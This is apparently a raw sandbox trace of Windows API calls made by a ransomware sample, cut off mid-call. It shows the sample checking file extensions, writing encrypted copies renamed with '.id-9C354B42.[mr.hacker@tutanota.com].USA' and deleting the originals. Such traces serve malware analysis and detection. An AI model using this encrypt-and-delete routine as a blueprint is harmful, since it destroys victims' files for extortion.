[0265.602] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0265.602] lstrlenW (lpString=".pdf") returned 4 [0265.602] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.602] lstrlenW (lpString=".xls") returned 4 [0265.602] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.602] lstrlenW (lpString=".xlsx") returned 5 [0265.602] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0265.602] lstrlenW (lpString=".ppt") returned 4 [0265.602] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.602] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.602] lstrlenW (lpString=".zip") returned 4 [0265.602] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.602] lstrlenW (lpString=".rar") returned 4 [0265.602] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.602] lstrlenW (lpString=".bz2") returned 4 [0265.602] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.602] lstrlenW (lpString=".7z") returned 3 [0265.602] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString=".dbf") returned 4 [0265.603] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString=".1cd") returned 4 [0265.603] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString=".jpg") returned 4 [0265.603] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString=".doc") returned 4 [0265.603] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString=".docx") returned 5 [0265.603] lstrcmpiW (lpString1=".docx", lpString2="s.png") returned -1 [0265.603] lstrlenW (lpString=".pdf") returned 4 [0265.603] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString=".xls") returned 4 [0265.603] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.603] lstrlenW (lpString=".xlsx") returned 5 [0265.603] lstrcmpiW (lpString1=".xlsx", lpString2="s.png") returned -1 [0265.603] lstrlenW (lpString=".ppt") returned 4 [0265.603] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.603] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.603] lstrlenW (lpString=".zip") returned 4 [0265.603] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.603] lstrlenW (lpString=".rar") returned 4 [0265.603] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.603] lstrlenW (lpString=".bz2") returned 4 [0265.603] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.603] lstrlenW (lpString=".7z") returned 3 [0265.604] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.604] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.604] lstrlenW (lpString=".dbf") returned 4 [0265.604] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.604] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.604] lstrlenW (lpString=".1cd") returned 4 [0265.604] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.604] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 65 [0265.604] lstrlenW (lpString=".jpg") returned 4 [0265.604] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.604] lstrcmpiW (lpString1=".wmv", lpString2=".USA") returned 1 [0265.604] lstrlenW (lpString="flower_precomp_matte.wmv") returned 24 [0265.604] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0265.605] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=77208) returned 1 [0265.605] CloseHandle (hObject=0x2a8) returned 1 [0265.605] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv")) returned 0x20 [0265.605] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.605] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.606] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 77 [0265.606] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 77 [0265.606] lstrlenW (lpString=".doc") returned 4 [0265.606] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0265.606] lstrlenW (lpString=".docx") returned 5 [0265.606] lstrcmpiW (lpString1=".docx", lpString2="e.wmv") returned -1 [0265.606] lstrlenW (lpString=".pdf") returned 4 [0265.606] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0265.606] lstrlenW (lpString=".xls") returned 4 [0265.606] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0265.606] lstrlenW (lpString=".xlsx") returned 5 [0265.606] lstrcmpiW (lpString1=".xlsx", lpString2="e.wmv") returned -1 [0265.606] lstrlenW (lpString=".ppt") returned 4 [0265.606] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0265.606] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 77 [0265.606] lstrlenW (lpString=".zip") returned 4 [0265.606] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0265.606] lstrlenW (lpString=".rar") returned 4 [0265.606] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0265.606] lstrlenW (lpString=".bz2") returned 4 [0265.606] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0265.606] lstrlenW (lpString=".7z") returned 3 [0265.606] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0265.606] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 77 [0265.606] lstrlenW (lpString=".dbf") returned 4 [0265.606] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0267.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.155] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.155] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.155] GetLastError () returned 0x0 [0267.155] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x752, lpOverlapped=0x0) returned 1 [0267.170] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x760, lpOverlapped=0x0) returned 1 [0267.171] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.171] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.229] SetEndOfFile (hFile=0x384) returned 1 [0267.229] CloseHandle (hObject=0x384) returned 1 [0267.229] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.229] SetEndOfFile (hFile=0x328) returned 1 [0267.231] CloseHandle (hObject=0x328) returned 1 [0267.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.232] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0267.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.232] lstrlenW (lpString=".doc") returned 4 [0267.232] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.232] lstrlenW (lpString=".docx") returned 5 [0267.232] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.232] lstrlenW (lpString=".pdf") returned 4 [0267.232] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.232] lstrlenW (lpString=".xls") returned 4 [0267.232] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.232] lstrlenW (lpString=".xlsx") returned 5 [0267.232] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.232] lstrlenW (lpString=".ppt") returned 4 [0267.232] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString=".zip") returned 4 [0267.233] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.233] lstrlenW (lpString=".rar") returned 4 [0267.233] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString=".bz2") returned 4 [0267.233] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString=".7z") returned 3 [0267.233] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString=".dbf") returned 4 [0267.233] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString=".1cd") returned 4 [0267.233] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString=".jpg") returned 4 [0267.233] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.233] lstrlenW (lpString=".doc") returned 4 [0267.233] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString=".docx") returned 5 [0267.233] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.233] lstrlenW (lpString=".pdf") returned 4 [0267.233] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.233] lstrlenW (lpString=".xls") returned 4 [0267.233] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.233] lstrlenW (lpString=".xlsx") returned 5 [0267.234] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.234] lstrlenW (lpString=".ppt") returned 4 [0267.234] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.234] lstrlenW (lpString=".zip") returned 4 [0267.234] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.234] lstrlenW (lpString=".rar") returned 4 [0267.234] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.234] lstrlenW (lpString=".bz2") returned 4 [0267.234] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.234] lstrlenW (lpString=".7z") returned 3 [0267.234] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.234] lstrlenW (lpString=".dbf") returned 4 [0267.234] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.234] lstrlenW (lpString=".1cd") returned 4 [0267.234] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0267.234] lstrlenW (lpString=".jpg") returned 4 [0267.234] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.234] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.234] lstrlenW (lpString="CG1606.WMF") returned 10 [0267.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.235] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3564) returned 1 [0267.235] CloseHandle (hObject=0x328) returned 1 [0267.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 0x20 [0267.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.236] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.236] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.237] GetLastError () returned 0x0 [0267.237] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xdec, lpOverlapped=0x0) returned 1 [0267.238] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xdf0, lpOverlapped=0x0) returned 1 [0267.239] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.239] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0267.239] SetEndOfFile (hFile=0x384) returned 1 [0267.241] CloseHandle (hObject=0x384) returned 1 [0267.241] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.241] SetEndOfFile (hFile=0x328) returned 1 [0267.246] CloseHandle (hObject=0x328) returned 1 [0267.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0267.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.246] lstrlenW (lpString=".doc") returned 4 [0267.246] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.246] lstrlenW (lpString=".docx") returned 5 [0267.246] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0267.246] lstrlenW (lpString=".pdf") returned 4 [0267.247] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.247] lstrlenW (lpString=".xls") returned 4 [0267.247] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.247] lstrlenW (lpString=".xlsx") returned 5 [0267.247] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0267.247] lstrlenW (lpString=".ppt") returned 4 [0267.247] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.247] lstrlenW (lpString=".zip") returned 4 [0267.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.247] lstrlenW (lpString=".rar") returned 4 [0267.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.247] lstrlenW (lpString=".bz2") returned 4 [0267.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.247] lstrlenW (lpString=".7z") returned 3 [0267.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.247] lstrlenW (lpString=".dbf") returned 4 [0267.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.307] lstrlenW (lpString=".1cd") returned 4 [0267.308] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.308] lstrlenW (lpString=".jpg") returned 4 [0267.308] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.308] lstrlenW (lpString=".doc") returned 4 [0267.308] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.308] lstrlenW (lpString=".docx") returned 5 [0267.308] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0267.308] lstrlenW (lpString=".pdf") returned 4 [0267.308] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.308] lstrlenW (lpString=".xls") returned 4 [0267.308] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.308] lstrlenW (lpString=".xlsx") returned 5 [0267.308] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0267.308] lstrlenW (lpString=".ppt") returned 4 [0267.308] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.308] lstrlenW (lpString=".zip") returned 4 [0267.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.309] lstrlenW (lpString=".rar") returned 4 [0267.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.309] lstrlenW (lpString=".bz2") returned 4 [0267.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.309] lstrlenW (lpString=".7z") returned 3 [0267.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.309] lstrlenW (lpString=".dbf") returned 4 [0267.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.309] lstrlenW (lpString=".1cd") returned 4 [0267.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0267.309] lstrlenW (lpString=".jpg") returned 4 [0267.309] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.309] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.309] lstrlenW (lpString="CLASSIC2.WMF") returned 12 [0267.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0267.560] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2262) returned 1 [0267.560] CloseHandle (hObject=0x380) returned 1 [0267.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 0x20 [0267.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0267.648] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.648] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.811] GetLastError () returned 0x0 [0267.811] ReadFile (in: hFile=0x37c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0267.813] WriteFile (in: hFile=0x348, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2e7fc9c, 